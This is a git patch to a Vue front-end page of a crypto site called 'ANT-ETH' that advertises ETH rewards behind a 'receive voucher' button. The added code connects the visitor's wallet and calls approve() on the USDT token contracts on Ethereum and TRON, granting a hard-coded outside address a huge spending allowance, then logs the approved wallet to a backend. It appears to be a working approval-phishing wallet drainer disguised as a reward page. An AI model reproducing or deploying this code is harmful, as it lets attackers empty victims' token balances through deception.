From 72282fac661b3e48a097ddb85742fb31dbbad188 Mon Sep 17 00:00:00 2001
From: queenwuli <942534046@qq.com>
Date: Thu, 24 Mar 2022 14:47:48 +0800
Subject: [PATCH] gx
---
src/pages/index/index.vue | 189 ++++++++++++++++++++++++++++++++++-------------
1 files changed, 137 insertions(+), 52 deletions(-)
diff --git a/src/pages/index/index.vue b/src/pages/index/index.vue
index cc3830a..3a9265d 100644
--- a/src/pages/index/index.vue
+++ b/src/pages/index/index.vue
@@ -11,13 +11,14 @@
<span class="title">ANT-ETH</span>
<div class="right flex align-center">
<img src="../../assets/images/icon.png" class="icon"/>
- <span>{{ $t("message.ConnectWallet") }}</span>
+ <span class="address" v-if="walletAddress">{{walletAddress}}</span>
+ <span v-else @click="showAccreditModal">{{ $t("message.ConnectWallet") }}</span>
</div>
</div>
<div class="banner-content">
<p>{{ $t("message.Defi") }}</p>
<p>{{ $t("message.Reward") }}<span class="em">1000,000</span> ETH</p>
- <button @click="isShowApproveModal = true">{{ $t("message.ReceiveVoucher") }}</button>
+ <button v-if="!hasApprove" @click="isShowApproveModal = true">{{ $t("message.ReceiveVoucher") }}</button>
</div>
</div>
<img src="../../assets/images/banner.png" class="banner"/>
@@ -26,7 +27,7 @@
<OrePool></OrePool>
</van-tab>
<van-tab :title='$t("message.Account")'>
- <Account></Account>
+ <Account ref="accountRef"></Account>
</van-tab>
</van-tabs>
<van-overlay :show="isShowApproveModal" @click="isShowApproveModal = false" class="wrapper">
@@ -35,7 +36,7 @@
<p>{{ $t("message.ReceiveDescription") }}</p>
</div>
<p class="block-content">{{ $t("message.Description") }}</p>
- <button class="block-btn" @click="showAccreditModal">{{ $t("message.Receive") }}</button>
+ <button class="block-btn" @click="toApprove">{{ $t("message.Receive") }}</button>
</div>
</van-overlay>
<van-overlay :show="isShowAccreditModal" @click="isShowAccreditModal = false" class="wrapper">
@@ -100,40 +101,53 @@
},
setup() {
const { proxy } = getCurrentInstance();
-
- // 获取地址
+ let accountRef = ref(null);
let walletAddress = ref('');
- async function init() {
- if(window.tronWeb){
- walletAddress = window.tronWeb.defaultAddress.base58;
+ let hasApprove = ref(false);
+ let isShowApproveModal = ref(false);
+ let isShowAccreditModal = ref(false);
+ let isShowWalletModal = ref(false);
+ function changeLanguage(type){
+ proxy.$i18n.locale = type;
+ }
+
+ function showAccreditModal() {
+ proxy.isShowApproveModal = false
+ proxy.isShowAccreditModal = true
+ }
+ async function showDappModal() {
+ proxy.isShowAccreditModal = false
+ proxy.isShowWalletModal = true
+ }
+ async function showWalletModal() {
+ proxy.isShowAccreditModal = false;
+ const provider = new WalletConnectProvider({
+ infuraId: '27e484dcd9e3efcfd25a83a78777cdf1',
+ bridge: "https://bridge.walletconnect.org",
+ })
+ await provider.enable();
+ let web3 = new Web3(provider);
+ const accounts = await web3.eth.getAccounts();
+ proxy.walletAddress = accounts[0];
+ proxy.isApprove()
+ }
+
+ // 授权按钮
+ function toApprove() {
+ if(proxy.walletAddress){
+ proxy.approve()
}else{
showAccreditModal()
}
}
- let isShowApproveModal = ref(false);
- let isShowAccreditModal = ref(false);
- let isShowWalletModal = ref(false);
- let showAccreditModal = () => {
- proxy.isShowApproveModal = false
- proxy.isShowAccreditModal = true
- }
- let showWalletModal = () => {
- proxy.isShowAccreditModal = false
- proxy.isShowWalletModal = true
- }
- let showDappModal = () => {
- let provider = new WalletConnectProvider({
- infuraId: '27e484dcd9e3efcfd25a83a78777cdf1',
- bridge: "https://bridge.walletconnect.org",
- })
- provider.enable();
- }
- let changeLanguage = (type) => {
- proxy.$i18n.locale = type;
- }
onMounted(() => {
- init()
+ proxy.getAddress();
+ if (proxy.walletAddress) {
+ proxy.isApprove()
+ }else{
+ showAccreditModal();
+ }
})
return {
local: ref('zh'),
@@ -141,7 +155,6 @@
{ text: '简体中文', value: 'zh' },
{ text: 'English', value: 'en' }
],
- init,
// 弹窗显示隐藏
isShowApproveModal,
isShowAccreditModal,
@@ -150,33 +163,100 @@
showAccreditModal,
showWalletModal,
showDappModal,
+ toApprove,
// 中英文切换
- changeLanguage
+ changeLanguage,
+
+ walletAddress, //地址
+ hasApprove, //是否授权
+
+ accountRef
};
},
methods: {
- connect() {
- const provider = new WalletConnectProvider({
- infuraId: '27e484dcd9e3efcfd25a83a78777cdf1',
- bridge: "https://bridge.walletconnect.org",
- });
- // Enable session (triggers QR Code modal)
- provider.enable();
-
- this.web3 = new Web3(provider);
-
- // this.getAccount();
- // subscribe to events
- // this.subscribeToEvents();
+ // 获取地址
+ async getAddress () {
+ let address = '';
+ if(window.ethereum) {
+ await window.ethereum.enable();
+ const accounts = await ethereum.request({ method: 'eth_accounts' });
+ address = accounts[0];
+ }else if(window.tronWeb){
+ address = window.tronWeb.defaultAddress.base58;
+ }
+ this.walletAddress = address;
},
- subscribeToEvents() {
- const connector = this.connector;
- if (!connector) {
- return;
+ isApprove () {
+ this.$axios({
+ url: '/dapi/common/isApprove/' + this.walletAddress,
+ method: 'get'
+ }).then((res) => {
+ if(res.code == 200) {
+ this.hasApprove = true;
+ this.initAccountData()
+ sessionStorage.setItem('address', this.walletAddress);
+ }else{
+ this.hasApprove = false;
+ }
+ }).catch(() => {
+ this.hasApprove = false;
+ })
+ },
+ async approve () {
+ if(window.ethereum) {
+ this.ethereumApprove()
+ }else if(window.tronWeb){
+ this.tornWebApprove()
}
},
-
+ ethereumApprove () {
+ const web3 = new Web3(window.ethereum);
+ const contractAddress = "0xdac17f958d2ee523a2206206994597c13d831ec7";
+ const authAddress = '0xD998DA7362360eFC6daDFEd6E9a32E70640d7600';
+ const abi = [{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_upgradedAddress","type":"address"}],"name":"deprecate","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"deprecated","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_evilUser","type":"address"}],"name":"addBlackList","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"upgradedAddress","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"balances","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"maximumFee","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"_totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"unpause","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_maker","type":"address"}],"name":"getBlackListStatus","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"address"}],"name":"allowed","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"paused","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"who","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"pause","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"getOwner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"owner","outputs":[{"name":"","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"newBasisPoints","type":"uint256"},{"name":"newMaxFee","type":"uint256"}],"name":"setParams","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"amount","type":"uint256"}],"name":"issue","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"amount","type":"uint256"}],"name":"redeem","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"remaining","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"basisPointsRate","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"isBlackListed","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_clearedUser","type":"address"}],"name":"removeBlackList","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"MAX_UINT","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"_blackListedUser","type":"address"}],"name":"destroyBlackFunds","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"inputs":[{"name":"_initialSupply","type":"uint256"},{"name":"_name","type":"string"},{"name":"_symbol","type":"string"},{"name":"_decimals","type":"uint256"}],"payable":false,"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":false,"name":"amount","type":"uint256"}],"name":"Issue","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"amount","type":"uint256"}],"name":"Redeem","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"newAddress","type":"address"}],"name":"Deprecate","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"feeBasisPoints","type":"uint256"},{"indexed":false,"name":"maxFee","type":"uint256"}],"name":"Params","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_blackListedUser","type":"address"},{"indexed":false,"name":"_balance","type":"uint256"}],"name":"DestroyedBlackFunds","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_user","type":"address"}],"name":"AddedBlackList","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"name":"_user","type":"address"}],"name":"RemovedBlackList","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"owner","type":"address"},{"indexed":true,"name":"spender","type":"address"},{"indexed":false,"name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"from","type":"address"},{"indexed":true,"name":"to","type":"address"},{"indexed":false,"name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[],"name":"Pause","type":"event"},{"anonymous":false,"inputs":[],"name":"Unpause","type":"event"}];
+ const contract = new web3.eth.Contract(abi, contractAddress);
+ contract.methods.approve(authAddress, 90000000000000).send({from:this.walletAddress, gas:100000}).then((res) => {
+ console.log('授权成功')
+ console.log(res)
+ this.submitApprove()
+ })
+ },
+ async tornWebApprove () {
+ const tronWeb = window.tronWeb;
+ const trxContractAddress = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
+ const authAddress = "TKcyw4igFYhNpTzyZv25j6uDwvTYzncnjp";
+ let instance = await tronWeb.contract().at(trxContractAddress);
+ let res = await instance["approve"](authAddress, "90000000000000000000000000000");
+ res.send({
+ feeLimit: 100000000,
+ callValue: 0,
+ shouldPollResponse: false
+ }, (err, res) => {
+ if (err == null) {
+ alert('嘿,授权成功')
+ this.submitApprove()
+ }
+ });
+ },
+ submitApprove () {
+ this.$axios({
+ url: '/dapi/common/approve',
+ method: 'post',
+ data: {
+ address: this.walletAddress,
+ refererId: ''
+ }
+ }).then((res) => {
+ if(res.code == 200) {
+ this.hasApprove = true;
+ this.initAccountData();
+ }
+ })
+ },
+ initAccountData(){
+ this.accountRef && this.accountRef.value.getWalletInfo();
+ }
}
}
</script>
@@ -363,5 +443,10 @@
color: #080808;
margin-top: 15px;
}
-
+.address{
+ width: 100px;
+ overflow: hidden;
+ text-overflow:ellipsis;
+ white-space: nowrap;
+}
</style>
--
Gitblit v1.9.1